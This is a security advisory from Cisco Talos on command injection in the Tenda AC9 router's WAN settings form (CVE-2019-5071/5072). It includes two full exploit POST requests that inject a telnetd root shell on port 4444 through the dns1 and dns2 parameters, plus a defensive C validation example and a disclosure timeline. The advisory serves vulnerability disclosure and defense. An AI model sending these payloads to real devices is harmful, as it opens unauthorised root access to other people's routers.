CVE-2019-5071: TALOS-2019-0861 || Cisco Talos Intelligence Group
Summary
An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of the Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router (AC9V1.0 Firmware V15.03.05.16_multi_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send an HTTP POST request containing a command to trigger this vulnerability.
Tested Versions
AC9V1.0 Firmware V15.03.05.16_multi_TRU
AC9V1.0 Firmware V15.03.05.14_EN
Product URLs
AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router
CVSSv3 Score
7.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Details
Tenda AC9 is a popular, low-cost Smart Dual-Band Gigabit WiFi router available on many online shopping sites such as Amazon.
A command injection vulnerability exists in the /goform/WanParameterSetting resource. A local authenticated attacker can include arbitrary commands in the POST parameters to execute commands on the Tenda AC9 router. The attacker can obtain a reverse shell running as root using this command injection.
CVE-2019-5071 - Command injection in the DNS1 post parameters
The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.
The exploitable POST request is shown below:
POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
Host: 10.10.10.1
Content-Length: 193
Accept: */*
Origin: http://10.10.10.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.10.10.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
Connection: close
wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns2=8.8.8.8&dns1=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
CVE-2019-5072 - Command injection in the DNS2 post parameters
The dns2 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.
The exploitable POST request is shown below:
POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
Host: 10.10.10.1
Content-Length: 193
Accept: */*
Origin: http://10.10.10.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.10.10.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
Connection: close
wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns1=8.8.8.8&dns2=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
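A hardened check for the dns1/dns2 parameters, as an added example that is not Tenda's firmware code (the advisory does not show the real handler; that the values reach a shell command is inferred from the injection): percent-decode the form value and accept it only if it parses as a dotted-quad IPv4 address, so the two request bodies above are rejected before anything can reach a command line. The decoder, `is_valid_ipv4` and `accept_dns_param` are names chosen for this example.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Hex digit value, or -1 if c is not a hex digit. */
static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode one application/x-www-form-urlencoded value into out. */
size_t url_decode(const char *in, char *out, size_t outlen) {
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < outlen; i++) {
        if (in[i] == '%' && hexval(in[i + 1]) >= 0 && hexval(in[i + 2]) >= 0) {
            out[o++] = (char)(hexval(in[i + 1]) * 16 + hexval(in[i + 2]));
            i += 2;
        } else if (in[i] == '+') {
            out[o++] = ' ';
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return o;
}

/* Allow-list check: inet_pton only accepts a well-formed dotted quad, so
 * shell metacharacters such as ';' can never pass. */
int is_valid_ipv4(const char *s) {
    struct in_addr addr;
    return inet_pton(AF_INET, s, &addr) == 1;
}

/* Decode a raw dns1/dns2 value into decoded[] and return 1 only if it is a
 * valid IPv4 address; a 0 return means the value must not be used anywhere. */
int accept_dns_param(const char *raw, char *decoded, size_t len) {
    url_decode(raw, decoded, len);
    return is_valid_ipv4(decoded);
}

int main(void) {
    /* Constructed inputs: a benign value and the dns1 value from the request above. */
    const char *samples[] = {"8.8.8.8", "%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B"};
    char buf[64];
    for (int i = 0; i < 2; i++)
        printf("%-45s -> %s\n", samples[i],
               accept_dns_param(samples[i], buf, sizeof buf) ? "accepted" : "rejected");
    return 0;
}
```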
Timeline
2019-07-29 - Initial contact
2019-08-07 - Sent plain text file
2019-10-02 - 60+ day follow up
2019-10-21 - 90 day follow up
2019-11-21 - Public Release
Discovered by Amit N. Raut of Cisco Talos.
Related news
Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the mask parameter at /goform/WanParameterSetting.